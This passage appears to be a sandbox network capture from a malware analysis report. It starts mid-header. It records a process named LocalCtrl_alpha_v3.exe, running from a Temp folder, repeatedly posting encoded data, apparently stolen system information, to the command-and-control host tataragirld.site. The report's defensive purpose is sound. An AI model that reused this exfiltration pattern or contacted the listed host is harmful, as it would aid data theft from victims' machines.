                                                                                                                                                                                                                                                                                                ontent: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hw
                                                                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B4Rl132WLX5fcyd7NFLJqshb%2FMkSUetF5Q74aMZidBTa%2F25XwUVy2df0AqCWmeIm44VscjpkIXwdeUh%2FUhtRz8FuN%2ByOm5Yd9ARLEcFO%2F3pswSVMNM26jeY5tUnJyUzIevt6"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                CF-RAY: 8fe3e59e189d0f68-EWR
                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1493&min_rtt=1487&rtt_var=570&sent=8&recv=14&lost=0&retrans=0&sent_bytes=2839&recv_bytes=11113&delivery_rate=1898569&cwnd=238&unsent_bytes=0&cid=580b70ddcc85e6e0&ts=362&x=0"


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                23192.168.2.750095188.114.97.34435440C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:34 UTC502OUTPOST /2009_New_England_Patriots_season?omlxpbik85mer=%2BBA7Gis1n3XVmJgLCG%2BgLgGVQ1E79NkVzyEnWTmwcxfStdd4il28zJlLoAzjvUO%2BK%2B3IAZfOMRKWTcb%2Fuzy%2FRA%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0
                                                                                                                                                                                                                                                                                                page: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hw
                                                                                                                                                                                                                                                                                                Content-Length: 9953
                                                                                                                                                                                                                                                                                                Host: tataragirld.site
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:34 UTC9953OUTData Raw: 03 00 00 00 fd ff ff ff 00 00 00 00 00 00 00 00 92 00 01 a6 26 00 00 38 ba fa 37 88 00 00 00 08 00 00 00 07 03 03 03 3b b9 f9 34 03 03 03 03 03 03 03 03 90 c3 03 93 71 25 03 03 3b b9 f9 34 03 03 03 03 03 03 03 03 53 48 00 07 2e 03 03 0b 0b 03 0f 04 27 54 94 30 ba 9d fc fc fc fc fc fc fc fc 19 03 17 03 44 71 62 61 61 66 71 5f 67 66 70 5f 41 5b 42 49 56 49 42 4c 46 4c 2d 69 73 64 02 03 13 03 01 07 03 03 03 03 03 03 04 07 03 03 03 03 03 03 02 01 07 fe f8 41 5b 42 49 56 49 42 4c 46 4c 59 53 5a 52 55 4e 53 4e 4e 53 5b 5b 4e 55 40 53 50 4f 57 57 4f 56 4c 4f 5a 5a 52 56 52 48 4f 51 4e 4c 52 4d 45 54 46 4c 40 5a 47 4c 4f 4a 57 53 40 55 47 4f 5a 50 54 5a 52 42 40 59 46 49 4a 47 4a 4f 4e 4d 4c 4c 56 55 46 55 41 4c 50 54 53 5b 5a 4f 41 4c 44 45 5a 54 4b 59 55 45 4d
                                                                                                                                                                                                                                                                                                Data Ascii: &87;4q%;4SH.'T0Dqbaafq_gfp_A[BIVIBLFL-isdA[BIVIBLFLYSZRUNSNNS[[NU@SPOWWOVLOZZRVRHOQNLRMETFL@ZGLOJWS@UGOZPTZRB@YFIJGJONMLLVUFUALPTS[ZOALDEZTKYUEM
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:35 UTC835INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                Date: Tue, 07 Jan 2025 12:19:35 GMT
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                ontent: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hw
                                                                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oumiaImEuhzT58OekwFdMcI9YqM3z2S%2Fl6CNeyTeMTMqzIXwpab9LjfjAbSHLUNWXQEKkK1uzQmHLyT0JWNs2aliComzVW5Q0Gzjb7ZtwB2HtKgp4U0NEFlkzfmvdw0Egc5H"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                CF-RAY: 8fe3e59f1c38f5f8-EWR
                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1659&min_rtt=1652&rtt_var=633&sent=9&recv=16&lost=0&retrans=0&sent_bytes=2840&recv_bytes=11113&delivery_rate=1709601&cwnd=91&unsent_bytes=0&cid=64b703ceaa4c1d3f&ts=290&x=0"


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                24192.168.2.750096188.114.97.34431532C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:36 UTC503OUTPOST /2009_New_England_Patriots_season?omlxpbik85mer=%2BBA7Gis1n3XVmJgLCG%2BgLgGVQ1E79NkVzyEnWTmwcxfStdd4il28zJlLoAzjvUO%2BK%2B3IAZfOMRKWTcb%2Fuzy%2FRA%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0
                                                                                                                                                                                                                                                                                                page: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hw
                                                                                                                                                                                                                                                                                                Content-Length: 66611
                                                                                                                                                                                                                                                                                                Host: tataragirld.site
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:36 UTC15331OUTData Raw: 03 00 00 00 fd ff ff ff 00 00 00 00 00 00 00 00 92 00 01 f8 03 01 00 19 52 44 2a 88 00 00 00 08 00 00 00 2b 0f 03 03 1a 51 47 29 03 03 03 03 03 03 03 03 98 c3 a5 32 34 31 3b 3a 31 aa 65 71 6c 6d 77 67 66 70 68 90 09 03 ce 49 66 92 91 ce 06 03 ce 07 03 cc 03 03 03 02 fc f7 03 03 da 25 4a 6d 77 66 6f 2b 51 2a 23 40 6c 71 66 2b 57 4e 2a 31 23 40 53 56 23 35 35 33 33 23 43 23 31 2d 37 33 23 44 4b 79 92 bc 4e 6a 60 71 6c 70 6c 65 77 23 41 62 70 6a 60 23 47 6a 70 73 6f 62 7a 23 42 67 62 73 77 66 71 c3 c0 df 03 bb a3 a5 50 7a 70 77 66 6e ab 51 66 64 6a 70 77 71 7a ab 70 6e 70 70 2d 66 7b 66 aa 60 70 71 70 70 2d 66 7b 66 a8 74 6a 6d 6a 6d 6a 77 2d 66 7b 66 aa 60 70 71 70 70 2d 66 7b 66 af 74 6a 6d 6f 6c 64 6c 6d 2d 66 7b 66 af 70 66 71 75 6a 60 66 70 2d 66 7b 66
                                                                                                                                                                                                                                                                                                Data Ascii: RD*+QG)241;:1eqlmwgfphIf%Jmwfo+Q*#@lqf+WN*1#@SV#5533#C#1-73#DKyNj`qlplew#Abpj`#Gjpsobz#BgbswfqPzpwfnQfdjpwqzpnpp-f{f`pqpp-f{ftjmjmjw-f{f`pqpp-f{ftjmoldlm-f{fpfquj`fp-f{f
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:36 UTC15331OUTData Raw: c6 89 9c ae 45 12 ff 26 3c aa fd 4a df 7c d0 f6 fc 88 a5 e0 f1 40 71 32 39 17 6b 28 2b df 2e b5 29 bc 35 3e 44 16 63 aa e9 86 68 dc ee a5 50 dd 9e a3 2d ab 92 af f7 1b 50 89 8e 3b 00 f7 1e 24 c1 ad 19 51 7c 7a f0 a6 79 da 42 55 57 aa 69 be ce 9f de bb 37 d3 ca dc b7 5d 25 d2 3a 71 58 b6 3d e0 8a 08 6b b6 be 2c 2c 7b ef e7 da 37 d4 7d b4 58 3c 85 33 f7 ba dc b8 56 76 b8 0b ec 97 d7 67 41 79 a0 bc 1b a1 1c 7d 8c 3c b4 ce d7 c5 1c 5d 60 bc 1c 55 ff c5 13 fe 2e 93 e2 a3 79 62 89 a3 9a 8c 58 f5 49 85 2f 97 d0 d7 f3 64 fa e8 c6 78 d4 de 8f 2a 51 3b 8b c8 9d cb d2 49 e0 7a 59 5e 95 30 15 63 ea e9 53 73 dc 80 46 63 21 c6 79 70 c7 d5 42 1c b7 be 7a 17 b1 f1 77 f8 a5 99 d9 04 0f e5 b5 f9 0f 82 bf cc 5e 30 35 d5 80 ac 4b 99 86 84 ea 97 a2 e3 38 4c 8f 9c 14 14 e8 eb
                                                                                                                                                                                                                                                                                                Data Ascii: E&<J|@q29k(+.)5>DchP-P;$Q|zyBUWi7]%:qX=k,,{7}X<3VvgAy}<]`U.ybXI/dx*Q;IzY^0cSsFc!ypBzw^05K8L
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:36 UTC15331OUTData Raw: ca 56 40 f7 23 e4 af fa bb 93 ed 75 07 33 06 81 d7 b6 6c 2c 9e 9c d4 5d 96 ce 10 81 dc 35 ff 5d 68 d7 d6 e0 01 01 bb 6f b3 d0 7d e9 78 ae 1f dc 68 e6 fb da ab 0c 9b 58 cc f4 9f b6 15 14 d1 5e fc 58 a6 61 14 78 e1 17 9d 15 7a 61 54 36 ce 23 83 2e 9b e2 f4 62 fb 21 83 19 f3 a8 e2 3d ee 38 0b 03 98 e2 78 4e 31 e4 af 0a bb 93 ed 8d 87 a0 4d c3 72 fc 71 fb d9 bd 1b e4 56 b6 94 9c 69 7c f7 fa d9 39 b4 b7 56 33 01 f3 8d 99 ea 3d 3a 85 5f c1 c5 90 1f 02 27 47 22 83 19 33 d1 73 dc 61 1a 01 fb fe 16 67 c5 f7 db 02 ed 6a 0b 3c 4a c7 ae 04 9a fe f6 56 a5 a2 15 04 02 5f 56 8e 37 bf 1b 54 35 4f f2 38 cf fb de e6 b4 98 cc 2c c7 2d f5 c7 b8 bd 0b 1f a7 e1 0d b5 e3 be f4 27 a5 d9 be ff 29 07 bc ee ef 80 a2 13 86 03 69 2f 53 3d de 17 e2 14 b9 2f 2e 57 6c bb b4 8c 03 8d 39
                                                                                                                                                                                                                                                                                                Data Ascii: V@#u3l,]5]ho}xhX^XaxzaT6#.b!=8xN1MrqVi|9V3=:_'G"3sagj<JV_V7T5O8,-')i/S=/.Wl9
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:36 UTC15331OUTData Raw: ba 9d 8c d7 e7 b2 48 c7 c7 ce 17 2e ba 53 c3 f4 44 d0 8f bc 89 c0 7d 78 ce f7 58 5e ea 4a 5d d7 bc 71 2a 14 8f 42 b9 88 c7 8d bd 67 10 87 20 62 5f cd 00 c4 da b7 e9 a2 93 ee ca a2 2c ff 9b d3 2b d7 e8 cd bc 75 2a 3e ea 3c 7f 4b f8 7c cc 0c aa 8a d4 47 18 7c fd 0f f8 02 1a e5 45 39 43 e1 c4 6b 0a 7d 22 01 ae f0 d3 ad 62 b8 12 ba dc 84 73 02 6a e1 f2 f7 e0 ab 02 70 fc 43 9c f4 1f ba 70 b6 3d ce f5 55 ec 36 c9 a7 4b 45 90 8c 60 79 cf fe e0 d0 bf 8b 7d 41 d9 ec a5 a7 c8 68 59 0e 1f b1 98 07 4c cb 0a 98 f4 7b 2f 3c d9 1d c0 fe e3 e6 b6 78 39 43 e7 e6 7d f6 f0 f9 48 ca 9d 08 25 33 dd 87 9b ff 96 f5 e0 dc 2d 19 fc a6 24 62 b1 bb 0f 57 fe 40 4c 41 42 a6 10 3d a3 79 93 aa 07 83 f9 e6 a2 8d 07 4b 27 a9 49 4f 69 a7 e3 c7 68 84 e9 f1 5b c2 fe bb 15 cb df 34 2a b0 9b
                                                                                                                                                                                                                                                                                                Data Ascii: H.SD}xX^J]q*Bg b_,+u*><K|G|E9Ck}"bsjpCp=U6KE`y}AhYL{/<x9C}H%3-$bW@LAB=yK'IOih[4*
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:36 UTC5287OUTData Raw: 52 04 37 fd 7c e3 36 91 30 01 a3 57 44 03 c0 bf 73 ce 1e 35 8c 6f 44 44 98 a2 33 e5 6d 7f 79 5d 03 80 7f c4 93 53 e8 a4 2b 22 5f da 54 97 b3 ed b4 85 2e 61 ab 8b 50 cd 95 ac 6d 24 7e a3 3d 0b c2 99 5c cd 26 0a 76 11 ef 77 6b 8d 71 c8 08 b8 0b 32 7d 69 9d 01 f5 2d 16 2a 0d b6 c5 9e cf 72 28 9e d0 88 20 53 c2 1a 64 4f 81 19 62 ae db d5 53 b8 7f 3d 87 2c 6d c2 6c 51 ab 4e 76 44 a7 ef 3d aa 8d a3 0a b1 64 b3 cf d8 27 33 04 df b7 7a a7 ed 8f 4c 25 37 9d 15 4c 4f 17 4c cf 4c 5a 96 bc ad b0 41 e1 aa 14 a9 6f 65 0f bc da a2 48 e4 16 ee b6 7d ac 89 df e2 8e 17 de d6 96 89 28 cd 57 07 d5 58 d0 a6 82 70 0c 62 7b 74 93 dc 93 bc 39 b1 10 b2 0c 8f 3c 5b 0f d4 cb 6b d7 0f 33 2f 25 18 58 49 c5 7f da f0 61 b1 18 11 b1 c9 44 76 38 d4 95 0e dd 76 49 f1 49 fa f2 ce 24 0e c5
                                                                                                                                                                                                                                                                                                Data Ascii: R7|60WDs5oDD3my]S+"_T.aPm$~=\&vwkq2}i-*r( SdObS=,mlQNvD=d'3zL%7LOLLZAoeH}(WXpb{t9<[k3/%XIaDv8vII$
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:36 UTC839INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                Date: Tue, 07 Jan 2025 12:19:36 GMT
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                ontent: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hw
                                                                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BOnlysmaJiI2OcWhk1jC%2FJmkbBh441s8UO6bR8YjZscy7rqr8AZ4V5dFFjWjjDMaZnfk4Bj9bT2VyrXeFNeQh2ARjjQw6EvVJi70KIRDeJVUZqS6UeWWAuHTYZkWDdnGg32K"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                CF-RAY: 8fe3e5a6c8758c29-EWR
                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1776&min_rtt=1765&rtt_var=685&sent=27&recv=73&lost=0&retrans=0&sent_bytes=2841&recv_bytes=67926&delivery_rate=1572428&cwnd=188&unsent_bytes=0&cid=81b61c672099fb2d&ts=565&x=0"


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                25192.168.2.750097188.114.97.34435440C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:36 UTC503OUTPOST /2009_New_England_Patriots_season?omlxpbik85mer=%2BBA7Gis1n3XVmJgLCG%2BgLgGVQ1E79NkVzyEnWTmwcxfStdd4il28zJlLoAzjvUO%2BK%2B3IAZfOMRKWTcb%2Fuzy%2FRA%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0
                                                                                                                                                                                                                                                                                                page: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hw
                                                                                                                                                                                                                                                                                                Content-Length: 66611
                                                                                                                                                                                                                                                                                                Host: tataragirld.site
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:36 UTC15331OUTData Raw: 03 00 00 00 fd ff ff ff 00 00 00 00 00 00 00 00 92 00 01 f8 03 01 00 19 52 44 2a 88 00 00 00 08 00 00 00 2b 0f 03 03 1a 51 47 29 03 03 03 03 03 03 03 03 98 c3 a5 32 34 31 3b 3a 31 aa 65 71 6c 6d 77 67 66 70 68 90 09 03 ce 49 66 92 91 ce 06 03 ce 07 03 cc 03 03 03 02 fc f7 03 03 da 25 4a 6d 77 66 6f 2b 51 2a 23 40 6c 71 66 2b 57 4e 2a 31 23 40 53 56 23 35 35 33 33 23 43 23 31 2d 37 33 23 44 4b 79 92 bc 4e 6a 60 71 6c 70 6c 65 77 23 41 62 70 6a 60 23 47 6a 70 73 6f 62 7a 23 42 67 62 73 77 66 71 c3 c0 df 03 bb a3 a5 50 7a 70 77 66 6e ab 51 66 64 6a 70 77 71 7a ab 70 6e 70 70 2d 66 7b 66 aa 60 70 71 70 70 2d 66 7b 66 a8 74 6a 6d 6a 6d 6a 77 2d 66 7b 66 aa 60 70 71 70 70 2d 66 7b 66 af 74 6a 6d 6f 6c 64 6c 6d 2d 66 7b 66 af 70 66 71 75 6a 60 66 70 2d 66 7b 66
                                                                                                                                                                                                                                                                                                Data Ascii: RD*+QG)241;:1eqlmwgfphIf%Jmwfo+Q*#@lqf+WN*1#@SV#5533#C#1-73#DKyNj`qlplew#Abpj`#Gjpsobz#BgbswfqPzpwfnQfdjpwqzpnpp-f{f`pqpp-f{ftjmjmjw-f{f`pqpp-f{ftjmoldlm-f{fpfquj`fp-f{f
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:36 UTC15331OUTData Raw: c6 89 9c ae 45 12 ff 26 3c aa fd 4a df 7c d0 f6 fc 88 a5 e0 f1 40 71 32 39 17 6b 28 2b df 2e b5 29 bc 35 3e 44 16 63 aa e9 86 68 dc ee a5 50 dd 9e a3 2d ab 92 af f7 1b 50 89 8e 3b 00 f7 1e 24 c1 ad 19 51 7c 7a f0 a6 79 da 42 55 57 aa 69 be ce 9f de bb 37 d3 ca dc b7 5d 25 d2 3a 71 58 b6 3d e0 8a 08 6b b6 be 2c 2c 7b ef e7 da 37 d4 7d b4 58 3c 85 33 f7 ba dc b8 56 76 b8 0b ec 97 d7 67 41 79 a0 bc 1b a1 1c 7d 8c 3c b4 ce d7 c5 1c 5d 60 bc 1c 55 ff c5 13 fe 2e 93 e2 a3 79 62 89 a3 9a 8c 58 f5 49 85 2f 97 d0 d7 f3 64 fa e8 c6 78 d4 de 8f 2a 51 3b 8b c8 9d cb d2 49 e0 7a 59 5e 95 30 15 63 ea e9 53 73 dc 80 46 63 21 c6 79 70 c7 d5 42 1c b7 be 7a 17 b1 f1 77 f8 a5 99 d9 04 0f e5 b5 f9 0f 82 bf cc 5e 30 35 d5 80 ac 4b 99 86 84 ea 97 a2 e3 38 4c 8f 9c 14 14 e8 eb
                                                                                                                                                                                                                                                                                                Data Ascii: E&<J|@q29k(+.)5>DchP-P;$Q|zyBUWi7]%:qX=k,,{7}X<3VvgAy}<]`U.ybXI/dx*Q;IzY^0cSsFc!ypBzw^05K8L
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:36 UTC15331OUTData Raw: ca 56 40 f7 23 e4 af fa bb 93 ed 75 07 33 06 81 d7 b6 6c 2c 9e 9c d4 5d 96 ce 10 81 dc 35 ff 5d 68 d7 d6 e0 01 01 bb 6f b3 d0 7d e9 78 ae 1f dc 68 e6 fb da ab 0c 9b 58 cc f4 9f b6 15 14 d1 5e fc 58 a6 61 14 78 e1 17 9d 15 7a 61 54 36 ce 23 83 2e 9b e2 f4 62 fb 21 83 19 f3 a8 e2 3d ee 38 0b 03 98 e2 78 4e 31 e4 af 0a bb 93 ed 8d 87 a0 4d c3 72 fc 71 fb d9 bd 1b e4 56 b6 94 9c 69 7c f7 fa d9 39 b4 b7 56 33 01 f3 8d 99 ea 3d 3a 85 5f c1 c5 90 1f 02 27 47 22 83 19 33 d1 73 dc 61 1a 01 fb fe 16 67 c5 f7 db 02 ed 6a 0b 3c 4a c7 ae 04 9a fe f6 56 a5 a2 15 04 02 5f 56 8e 37 bf 1b 54 35 4f f2 38 cf fb de e6 b4 98 cc 2c c7 2d f5 c7 b8 bd 0b 1f a7 e1 0d b5 e3 be f4 27 a5 d9 be ff 29 07 bc ee ef 80 a2 13 86 03 69 2f 53 3d de 17 e2 14 b9 2f 2e 57 6c bb b4 8c 03 8d 39
                                                                                                                                                                                                                                                                                                Data Ascii: V@#u3l,]5]ho}xhX^XaxzaT6#.b!=8xN1MrqVi|9V3=:_'G"3sagj<JV_V7T5O8,-')i/S=/.Wl9
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:36 UTC15331OUTData Raw: ba 9d 8c d7 e7 b2 48 c7 c7 ce 17 2e ba 53 c3 f4 44 d0 8f bc 89 c0 7d 78 ce f7 58 5e ea 4a 5d d7 bc 71 2a 14 8f 42 b9 88 c7 8d bd 67 10 87 20 62 5f cd 00 c4 da b7 e9 a2 93 ee ca a2 2c ff 9b d3 2b d7 e8 cd bc 75 2a 3e ea 3c 7f 4b f8 7c cc 0c aa 8a d4 47 18 7c fd 0f f8 02 1a e5 45 39 43 e1 c4 6b 0a 7d 22 01 ae f0 d3 ad 62 b8 12 ba dc 84 73 02 6a e1 f2 f7 e0 ab 02 70 fc 43 9c f4 1f ba 70 b6 3d ce f5 55 ec 36 c9 a7 4b 45 90 8c 60 79 cf fe e0 d0 bf 8b 7d 41 d9 ec a5 a7 c8 68 59 0e 1f b1 98 07 4c cb 0a 98 f4 7b 2f 3c d9 1d c0 fe e3 e6 b6 78 39 43 e7 e6 7d f6 f0 f9 48 ca 9d 08 25 33 dd 87 9b ff 96 f5 e0 dc 2d 19 fc a6 24 62 b1 bb 0f 57 fe 40 4c 41 42 a6 10 3d a3 79 93 aa 07 83 f9 e6 a2 8d 07 4b 27 a9 49 4f 69 a7 e3 c7 68 84 e9 f1 5b c2 fe bb 15 cb df 34 2a b0 9b
                                                                                                                                                                                                                                                                                                Data Ascii: H.SD}xX^J]q*Bg b_,+u*><K|G|E9Ck}"bsjpCp=U6KE`y}AhYL{/<x9C}H%3-$bW@LAB=yK'IOih[4*
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:36 UTC5287OUTData Raw: 52 04 37 fd 7c e3 36 91 30 01 a3 57 44 03 c0 bf 73 ce 1e 35 8c 6f 44 44 98 a2 33 e5 6d 7f 79 5d 03 80 7f c4 93 53 e8 a4 2b 22 5f da 54 97 b3 ed b4 85 2e 61 ab 8b 50 cd 95 ac 6d 24 7e a3 3d 0b c2 99 5c cd 26 0a 76 11 ef 77 6b 8d 71 c8 08 b8 0b 32 7d 69 9d 01 f5 2d 16 2a 0d b6 c5 9e cf 72 28 9e d0 88 20 53 c2 1a 64 4f 81 19 62 ae db d5 53 b8 7f 3d 87 2c 6d c2 6c 51 ab 4e 76 44 a7 ef 3d aa 8d a3 0a b1 64 b3 cf d8 27 33 04 df b7 7a a7 ed 8f 4c 25 37 9d 15 4c 4f 17 4c cf 4c 5a 96 bc ad b0 41 e1 aa 14 a9 6f 65 0f bc da a2 48 e4 16 ee b6 7d ac 89 df e2 8e 17 de d6 96 89 28 cd 57 07 d5 58 d0 a6 82 70 0c 62 7b 74 93 dc 93 bc 39 b1 10 b2 0c 8f 3c 5b 0f d4 cb 6b d7 0f 33 2f 25 18 58 49 c5 7f da f0 61 b1 18 11 b1 c9 44 76 38 d4 95 0e dd 76 49 f1 49 fa f2 ce 24 0e c5
                                                                                                                                                                                                                                                                                                Data Ascii: R7|60WDs5oDD3my]S+"_T.aPm$~=\&vwkq2}i-*r( SdObS=,mlQNvD=d'3zL%7LOLLZAoeH}(WXpb{t9<[k3/%XIaDv8vII$
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:36 UTC841INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                Date: Tue, 07 Jan 2025 12:19:36 GMT
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                ontent: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hw
                                                                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y0Ke2fv3WJjFS3lwV7iemZxVsVM30KDoNYKz%2FRV0Xonu%2Fzbtub2Re%2Fu8LJnGNznTFxI94oTXti5xoYstMmHiIcNLy1od9Di6ExMAnjTJk7I9NRy4vRma2twHGcP4KoqePWIQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                CF-RAY: 8fe3e5a86f9e0f3a-EWR
                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1767&min_rtt=1712&rtt_var=681&sent=28&recv=74&lost=0&retrans=0&sent_bytes=2840&recv_bytes=67926&delivery_rate=1705607&cwnd=165&unsent_bytes=0&cid=e84fc46efd7e3245&ts=573&x=0"


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                26192.168.2.750098188.114.97.34431532C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:37 UTC500OUTPOST /2009_New_England_Patriots_season?omlxpbik85mer=%2BBA7Gis1n3XVmJgLCG%2BgLgGVQ1E79NkVzyEnWTmwcxfStdd4il28zJlLoAzjvUO%2BK%2B3IAZfOMRKWTcb%2Fuzy%2FRA%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0
                                                                                                                                                                                                                                                                                                page: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hw
                                                                                                                                                                                                                                                                                                Content-Length: 35
                                                                                                                                                                                                                                                                                                Host: tataragirld.site
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:37 UTC35OUTData Raw: 03 00 00 00 fd ff ff ff 00 00 00 00 00 00 00 00 92 00 02 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:37 UTC734INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                Date: Tue, 07 Jan 2025 12:19:37 GMT
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yMwMesXzWsH4Xs8taPEqTi1Xk73bdeIsQWcg5116SXMWFjbR%2FrSfS6R%2FD%2BBE7K6XXTIC%2Fw2AEjC22qMfdqHg98yyEuRmNRqP6YbZyMvt%2FVwYS9ykb%2ByPDBVIPt0A7%2FI4JeYK"}],"group":"cf-nel","max_age":604800}
